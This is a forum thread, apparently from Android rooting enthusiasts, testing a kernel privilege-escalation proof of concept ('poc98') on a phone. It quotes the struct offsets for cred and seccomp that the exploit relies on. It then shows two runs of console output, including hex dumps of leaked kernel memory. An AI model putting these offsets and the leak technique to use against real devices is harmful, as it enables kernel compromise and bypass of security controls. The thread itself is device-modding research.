Quote:
Originally Posted by
StormSeeker1
Arpruss is trying to help us! Here's what he says:
"What happens if you run poc98 from my github on the device?
Here are the crucial offsets:
#define OFFSET__task_struct__cred 0x550
#define OFFSET__task_struct__seccomp 0x9b0
#define OFFSET__cred__uid 0x004
#define OFFSET__cred__securebits 0x024
#define OFFSET__cred__cap_permitted 0x030
If you're lucky, none need to be changed.
If you're not lucky, you will need to change cred and seccomp. These are offsets of the cred and seccomp fields in task_struct, defined in the kernel's sched.h file. Getting these offsets isn't trivial, however, because there are a lot of #ifdefs to deal with. Tonight I plan to see if I can modify the code to automatically detect these offsets, but I don't guarantee it'll work.
If you're really unlucky, you will need to change them all."
Can anyone of you, guys, perform the test he needs (compiling and running poc98 from his github repository and let us know the outcome)?
I ran it with the default values, here is the output
epito:/data/local/tmp $ ./poc98
Starting POC
Leak size 4096
dataBuffer = 75f5a1bb80
PARENT: Calling WRITEV
CHILD: Doing EPOLL_CTL_DEL.
CHILD: Finished EPOLL_CTL_DEL.
CHILD: initial page
CHILD: dummy data
CHILD: leak data
writev() returns 0x12001
CHILD: Finished write to FIFO.
PARENT: Done with leaking
00000000 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000010 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000030 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000040 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
*/ a bunch of lines were removed to make the text fit post limits/*
000005a0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
000005b0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
000005c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
000005d0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
000005e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
000005f0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000600 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000610 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000620 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000630 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000640 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000650 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000660 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000670 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000680 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000690 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
000006a0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
000006b0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
000006c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
000006d0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
000006e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
000006f0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000700 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000710 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000720 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000730 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000740 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000750 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000760 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000770 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000780 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000790 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
000007a0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
000007b0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
000007c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
000007d0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
000007e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
000007f0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000800 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000810 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000820 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000830 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000840 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000850 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000860 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000870 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000880 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000890 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
000008a0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
000008b0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
000008c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
000008d0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
000008e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
000008f0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000900 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000910 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000920 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000930 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000940 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000950 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000960 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000970 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000980 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000990 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
000009a0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
000009b0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
000009c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
000009d0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
000009e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
000009f0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000a00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000a10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000a20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000a30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000a40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000a50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000a60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000a70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000a80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000a90 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000aa0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000ab0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000ac0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000ad0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000ae0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000af0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000b00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000b10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000b20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000b30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000b40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000b50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000b60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000b70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000b80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000b90 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000ba0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000bb0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000bc0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000bd0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000be0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000bf0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000c00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000c10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000c20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000c30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000c40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000c50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000c60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000c70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000c80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000c90 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000ca0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000cb0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000cc0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000cd0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000ce0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000cf0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000d00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000d10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000d20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000d30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000d40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000d50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000d60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000d70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000d80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000d90 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000da0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000db0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000dc0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000dd0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000de0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000df0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000e00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000e10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000e20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000e30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000e40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000e50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000e60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000e70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000e80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000e90 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000ea0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000eb0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000ec0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000ed0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000ee0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000ef0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000f00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000f10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000f20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000f30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000f40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000f50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000f60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000f70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000f80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000f90 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000fa0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000fb0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000fc0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000fd0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000fe0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000ff0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
tasklist = 0
current_ptr = 0
Pepito:/data/local/tmp $ ./poc98
Starting POC
Leak size 4096
dataBuffer = 700141b7c0
PARENT: Calling WRITEV
CHILD: Doing EPOLL_CTL_DEL.
CHILD: Finished EPOLL_CTL_DEL.
CHILD: initial page
CHILD: dummy data
CHILD: leak data
writev() returns 0x12001
CHILD: Finished write to FIFO.
PARENT: Done with leaking
00000000 a0 7c df 97 c0 ff ff ff a0 7c df 97 c0 ff ff ff |.|.......|......|
00000010 c0 b7 41 01 70 00 00 00 01 00 01 00 00 00 00 00 |..A.p...........|
00000020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
*/I cut out a bunch of line here to make the text fit post limits/*
00000530 65 73 00 76 6f 73 5f 73 74 61 72 74 00 64 6f 74 |es.vos_start.dot|
00000540 31 31 66 55 6e 70 61 63 6b 49 65 50 32 50 57 53 |11fUnpackIeP2PWS|
00000550 43 50 72 6f 76 69 73 69 6f 6e 44 69 73 63 6f 76 |CProvisionDiscov|
00000560 65 72 79 52 65 73 00 57 44 49 5f 50 72 6f 63 65 |eryRes.WDI_Proce|
00000570 73 73 53 65 74 42 73 73 4b 65 79 52 65 71 00 57 |ssSetBssKeyReq.W|
00000580 4c 41 4e 54 4c 5f 52 65 73 65 74 52 78 53 53 4e |LANTL_ResetRxSSN|
00000590 00 76 6f 73 5f 77 64 74 68 72 65 61 64 5f 69 6e |.vos_wdthread_in|
000005a0 69 74 5f 74 69 6d 65 72 5f 77 6f 72 6b 00 57 44 |it_timer_work.WD|
000005b0 49 5f 50 72 6f 63 65 73 73 44 65 6c 53 54 41 52 |I_ProcessDelSTAR|
000005c0 65 71 00 76 6f 73 5f 70 6b 74 5f 72 65 73 65 72 |eq.vos_pkt_reser|
000005d0 76 65 5f 68 65 61 64 5f 66 61 73 74 00 57 4c 41 |ve_head_fast.WLA|
000005e0 4e 54 4c 5f 53 65 74 53 54 41 50 72 69 6f 72 69 |NTL_SetSTAPriori|
000005f0 74 79 00 63 73 72 49 73 46 75 6c 6c 50 6f 77 65 |ty.csrIsFullPowe|
00000600 72 4e 65 65 64 65 64 00 64 6f 74 31 31 66 55 6e |rNeeded.dot11fUn|
00000610 70 61 63 6b 41 64 64 42 41 52 65 71 00 57 44 49 |packAddBAReq.WDI|
00000620 5f 46 61 74 61 6c 45 76 65 6e 74 4c 6f 67 73 52 |_FatalEventLogsR|
00000630 65 71 00 57 44 49 5f 52 65 6d 6f 76 65 53 54 41 |eq.WDI_RemoveSTA|
00000640 42 63 61 73 74 4b 65 79 52 65 71 00 6c 69 6d 50 |BcastKeyReq.limP|
00000650 72 6f 63 65 73 73 44 65 61 75 74 68 46 72 61 6d |rocessDeauthFram|
00000660 65 00 64 6f 74 31 31 66 50 61 63 6b 46 66 4c 69 |e.dot11fPackFfLi|
00000670 6e 6b 4d 61 72 67 69 6e 00 57 44 49 5f 53 65 6e |nkMargin.WDI_Sen|
00000680 64 4e 76 42 6c 6f 62 52 65 71 00 57 4c 41 4e 54 |dNvBlobReq.WLANT|
00000690 4c 5f 49 73 44 75 70 6c 69 63 61 74 65 4d 63 61 |L_IsDuplicateMca|
000006a0 73 74 46 72 6d 00 6c 69 6d 49 73 43 68 61 6e 53 |stFrm.limIsChanS|
000006b0 77 69 74 63 68 52 75 6e 6e 69 6e 67 00 57 4c 41 |witchRunning.WLA|
000006c0 4e 53 41 50 5f 43 6c 6f 73 65 00 77 6c 61 6e 5f |NSAP_Close.wlan_|
000006d0 68 64 64 5f 63 68 65 63 6b 5f 6d 6f 6e 69 74 6f |hdd_check_monito|
000006e0 72 5f 73 74 61 74 65 00 77 6c 61 6e 5f 68 64 64 |r_state.wlan_hdd|
000006f0 5f 74 64 6c 73 5f 72 65 65 6e 61 62 6c 65 00 63 |_tdls_reenable.c|
00000700 73 72 52 6f 61 6d 46 69 6e 64 49 6e 50 65 53 74 |srRoamFindInPeSt|
00000710 61 74 73 52 65 71 4c 69 73 74 00 57 44 41 5f 49 |atsReqList.WDA_I|
00000720 73 57 63 6e 73 73 57 6c 61 6e 43 6f 6d 70 69 6c |sWcnssWlanCompil|
00000730 65 64 56 65 72 73 69 6f 6e 47 72 65 61 74 65 72 |edVersionGreater|
00000740 54 68 61 6e 4f 72 45 71 75 61 6c 00 6c 69 6d 53 |ThanOrEqual.limS|
00000750 65 6e 64 54 64 6c 73 4c 69 6e 6b 53 65 74 75 70 |endTdlsLinkSetup|
00000760 52 65 71 46 72 61 6d 65 00 64 6f 74 31 31 66 55 |ReqFrame.dot11fU|
00000770 6e 70 61 63 6b 49 65 43 68 61 6c 6c 65 6e 67 65 |npackIeChallenge|
00000780 54 65 78 74 00 6c 69 6d 47 65 74 53 74 61 48 61 |Text.limGetStaHa|
00000790 73 68 42 73 73 69 64 78 00 57 44 49 5f 50 72 6f |shBssidx.WDI_Pro|
000007a0 63 65 73 73 53 65 74 54 6d 4c 65 76 65 6c 52 65 |cessSetTmLevelRe|
000007b0 71 00 64 6f 74 31 31 66 50 61 63 6b 4e 65 69 67 |q.dot11fPackNeig|
000007c0 68 62 6f 72 52 65 70 6f 72 74 52 65 71 75 65 73 |hborReportReques|
000007d0 74 00 6c 69 6d 55 70 64 61 74 65 53 74 61 52 75 |t.limUpdateStaRu|
000007e0 6e 54 69 6d 65 48 54 43 61 70 61 62 69 6c 69 74 |nTimeHTCapabilit|
000007f0 79 00 57 4c 41 4e 54 4c 5f 43 6c 65 61 72 53 54 |y.WLANTL_ClearST|
00000800 41 43 6c 69 65 6e 74 00 77 70 61 6c 50 61 63 6b |AClient.wpalPack|
00000810 65 74 49 6e 69 74 00 57 44 41 5f 44 65 6c 53 54 |etInit.WDA_DelST|
00000820 41 52 73 70 43 61 6c 6c 62 61 63 6b 00 43 6f 6e |ARspCallback.Con|
00000830 76 65 72 74 57 50 41 4f 70 61 71 75 65 00 6c 69 |vertWPAOpaque.li|
00000840 6d 53 65 6e 64 4b 65 65 70 41 6c 69 76 65 54 6f |mSendKeepAliveTo|
00000850 50 65 65 72 00 57 44 49 5f 44 65 6c 53 54 41 52 |Peer.WDI_DelSTAR|
00000860 65 71 00 77 6c 61 6e 5f 68 64 64 5f 73 65 74 49 |eq.wlan_hdd_setI|
00000870 50 76 36 46 69 6c 74 65 72 00 70 65 43 72 65 61 |Pv6Filter.peCrea|
00000880 74 65 53 65 73 73 69 6f 6e 00 6c 69 6d 43 6f 6c |teSession.limCol|
00000890 6c 65 63 74 42 73 73 44 65 73 63 72 69 70 74 69 |lectBssDescripti|
000008a0 6f 6e 00 73 6d 65 5f 67 65 74 52 6f 61 6d 52 73 |on.sme_getRoamRs|
000008b0 73 69 44 69 66 66 00 57 44 49 5f 48 54 34 30 4f |siDiff.WDI_HT40O|
000008c0 42 53 53 53 74 6f 70 53 63 61 6e 49 6e 64 00 6c |BSSStopScanInd.l|
000008d0 69 6d 44 65 61 75 74 68 54 78 43 6f 6d 70 6c 65 |imDeauthTxComple|
000008e0 74 65 43 6e 66 00 70 6d 63 52 65 61 64 79 00 57 |teCnf.pmcReady.W|
000008f0 4c 41 4e 54 4c 5f 52 65 61 64 52 53 53 49 00 73 |LANTL_ReadRSSI.s|
00000900 6d 65 5f 51 6f 73 52 65 6c 65 61 73 65 52 65 71 |me_QosReleaseReq|
00000910 00 5f 5f 68 64 64 5f 69 70 76 36 5f 6e 6f 74 69 |.__hdd_ipv6_noti|
00000920 66 69 65 72 5f 77 6f 72 6b 5f 71 75 65 75 65 00 |fier_work_queue.|
00000930 64 6f 74 31 31 66 55 6e 70 61 63 6b 49 65 50 32 |dot11fUnpackIeP2|
00000940 50 47 4f 4e 65 67 43 6e 66 00 68 64 64 5f 69 73 |PGONegCnf.hdd_is|
00000950 5f 61 6e 79 5f 73 65 73 73 69 6f 6e 5f 63 6f 6e |_any_session_con|
00000960 6e 65 63 74 65 64 00 63 73 72 4c 4c 49 6e 73 65 |nected.csrLLInse|
00000970 72 74 48 65 61 64 00 62 74 63 53 65 6e 64 43 66 |rtHead.btcSendCf|
00000980 67 4d 73 67 00 50 6f 70 75 6c 61 74 65 44 6f 74 |gMsg.PopulateDot|
00000990 31 31 66 54 64 6c 73 45 78 74 43 61 70 61 62 69 |11fTdlsExtCapabi|
000009a0 6c 69 74 79 00 67 52 61 74 65 66 72 6f 6d 49 64 |lity.gRatefromId|
000009b0 78 00 50 6f 70 75 6c 61 74 65 44 6f 74 31 31 66 |x.PopulateDot11f|
000009c0 57 4d 4d 50 61 72 61 6d 73 00 73 6d 65 5f 51 6f |WMMParams.sme_Qo|
000009d0 73 54 72 69 67 67 65 72 55 61 70 73 64 43 68 61 |sTriggerUapsdCha|
000009e0 6e 67 65 00 57 44 49 5f 53 77 69 74 63 68 43 68 |nge.WDI_SwitchCh|
000009f0 52 65 71 5f 56 31 00 57 4c 41 4e 54 4c 5f 52 65 |Req_V1.WLANTL_Re|
00000a00 67 69 73 74 65 72 4d 67 6d 74 46 72 6d 43 6c 69 |gisterMgmtFrmCli|
00000a10 65 6e 74 00 57 44 49 5f 44 53 5f 4d 65 6d 50 6f |ent.WDI_DS_MemPo|
00000a20 6f 6c 41 64 64 53 54 41 00 64 6f 74 31 31 66 50 |olAddSTA.dot11fP|
00000a30 61 63 6b 49 65 51 42 53 53 4c 6f 61 64 00 57 4c |ackIeQBSSLoad.WL|
00000a40 41 4e 54 4c 5f 43 6c 65 61 72 54 78 58 6d 69 74 |ANTL_ClearTxXmit|
00000a50 50 65 6e 64 69 6e 67 00 68 64 64 5f 77 6c 61 6e |Pending.hdd_wlan|
00000a60 5f 65 78 69 74 00 64 6f 74 31 31 66 55 6e 70 61 |_exit.dot11fUnpa|
00000a70 63 6b 49 65 50 6f 77 65 72 43 6f 6e 73 74 72 61 |ckIePowerConstra|
00000a80 69 6e 74 73 00 6c 69 6d 53 65 6e 64 42 65 61 63 |ints.limSendBeac|
00000a90 6f 6e 50 61 72 61 6d 73 00 77 6c 61 6e 5f 70 6b |onParams.wlan_pk|
00000aa0 74 5f 73 74 61 74 73 5f 74 6f 5f 75 73 65 72 00 |t_stats_to_user.|
00000ab0 57 44 49 5f 50 72 6f 63 65 73 73 45 6e 74 65 72 |WDI_ProcessEnter|
00000ac0 42 6d 70 73 52 65 71 00 68 64 64 5f 66 75 6c 6c |BmpsReq.hdd_full|
00000ad0 5f 70 77 72 5f 63 62 6b 00 70 6d 6d 45 6e 74 65 |_pwr_cbk.pmmEnte|
00000ae0 72 57 6f 77 6c 61 6e 52 65 73 70 6f 6e 73 65 48 |rWowlanResponseH|
00000af0 61 6e 64 6c 65 72 00 57 44 49 5f 50 72 6f 63 65 |andler.WDI_Proce|
00000b00 73 73 54 64 6c 73 43 68 61 6e 53 77 69 74 63 68 |ssTdlsChanSwitch|
00000b10 52 65 71 00 57 4c 41 4e 44 58 45 5f 54 78 46 72 |Req.WLANDXE_TxFr|
00000b20 61 6d 65 00 63 73 72 53 65 6e 64 4d 42 47 65 74 |ame.csrSendMBGet|
00000b30 57 50 53 50 42 43 53 65 73 73 69 6f 6e 73 00 57 |WPSPBCSessions.W|
00000b40 4c 41 4e 44 58 45 5f 43 68 61 6e 6e 65 6c 44 65 |LANDXE_ChannelDe|
00000b50 62 75 67 00 6c 69 6d 53 65 6e 64 53 6d 65 41 64 |bug.limSendSmeAd|
00000b60 64 74 73 52 73 70 00 73 6d 73 4c 6f 67 00 70 75 |dtsRsp.smsLog.pu|
00000b70 72 67 65 53 6d 65 53 65 73 73 69 6f 6e 43 6d 64 |rgeSmeSessionCmd|
00000b80 4c 69 73 74 00 63 73 72 4e 65 69 67 68 62 6f 72 |List.csrNeighbor|
00000b90 52 6f 61 6d 45 6d 70 74 79 53 63 61 6e 52 65 66 |RoamEmptyScanRef|
00000ba0 72 65 73 68 54 69 6d 65 72 43 61 6c 6c 62 61 63 |reshTimerCallbac|
00000bb0 6b 00 57 44 49 5f 64 65 6c 42 61 49 6e 64 00 63 |k.WDI_delBaInd.c|
00000bc0 73 72 5f 72 65 67 69 73 74 65 72 5f 72 6f 61 6d |sr_register_roam|
00000bd0 69 6e 67 5f 6d 62 62 5f 63 61 6c 6c 62 61 63 6b |ing_mbb_callback|
00000be0 00 57 44 41 5f 53 65 6e 64 42 65 61 63 6f 6e 50 |.WDA_SendBeaconP|
00000bf0 61 72 61 6d 73 43 61 6c 6c 62 61 63 6b 00 73 6d |aramsCallback.sm|
00000c00 65 5f 52 65 6d 61 69 6e 4f 6e 43 68 61 6e 6e 65 |e_RemainOnChanne|
00000c10 6c 00 72 72 6d 43 6c 65 61 6e 75 70 00 63 73 72 |l.rrmCleanup.csr|
00000c20 41 70 70 6c 79 50 6f 77 65 72 32 43 75 72 72 65 |ApplyPower2Curre|
00000c30 6e 74 00 57 44 49 5f 57 6f 77 6c 44 65 6c 42 63 |nt.WDI_WowlDelBc|
00000c40 50 74 72 6e 52 65 71 00 57 44 49 5f 50 72 6f 63 |PtrnReq.WDI_Proc|
00000c50 65 73 73 55 70 64 61 74 65 43 68 61 6e 6e 65 6c |essUpdateChannel|
00000c60 50 61 72 61 6d 73 52 65 71 00 6c 69 6d 44 65 6c |ParamsReq.limDel|
00000c70 65 74 65 42 41 53 65 73 73 69 6f 6e 73 00 63 73 |eteBASessions.cs|
00000c80 72 53 63 61 6e 47 65 74 41 67 65 4f 75 74 54 69 |rScanGetAgeOutTi|
00000c90 6d 65 00 64 6f 74 31 31 66 55 6e 70 61 63 6b 49 |me.dot11fUnpackI|
00000ca0 65 50 72 6f 70 43 61 70 61 62 69 6c 69 74 79 00 |ePropCapability.|
00000cb0 64 6f 74 31 31 66 55 6e 70 61 63 6b 49 65 53 75 |dot11fUnpackIeSu|
00000cc0 70 70 43 68 61 6e 6e 65 6c 73 00 73 6d 65 5f 47 |ppChannels.sme_G|
00000cd0 65 74 52 6f 61 6d 53 63 61 6e 43 6f 6e 74 72 6f |etRoamScanContro|
00000ce0 6c 00 63 73 72 46 72 65 65 53 63 61 6e 52 65 73 |l.csrFreeScanRes|
00000cf0 75 6c 74 45 6e 74 72 79 00 76 6f 73 5f 77 61 74 |ultEntry.vos_wat|
00000d00 63 68 64 6f 67 5f 6f 70 65 6e 00 57 44 41 5f 45 |chdog_open.WDA_E|
00000d10 6e 74 65 72 42 6d 70 73 52 65 73 70 43 61 6c 6c |nterBmpsRespCall|
00000d20 62 61 63 6b 00 63 73 72 52 6f 61 6d 50 72 6f 63 |back.csrRoamProc|
00000d30 65 73 73 57 6d 53 74 61 74 75 73 43 68 61 6e 67 |essWmStatusChang|
00000d40 65 43 6f 6d 6d 61 6e 64 00 57 44 49 5f 50 61 63 |eCommand.WDI_Pac|
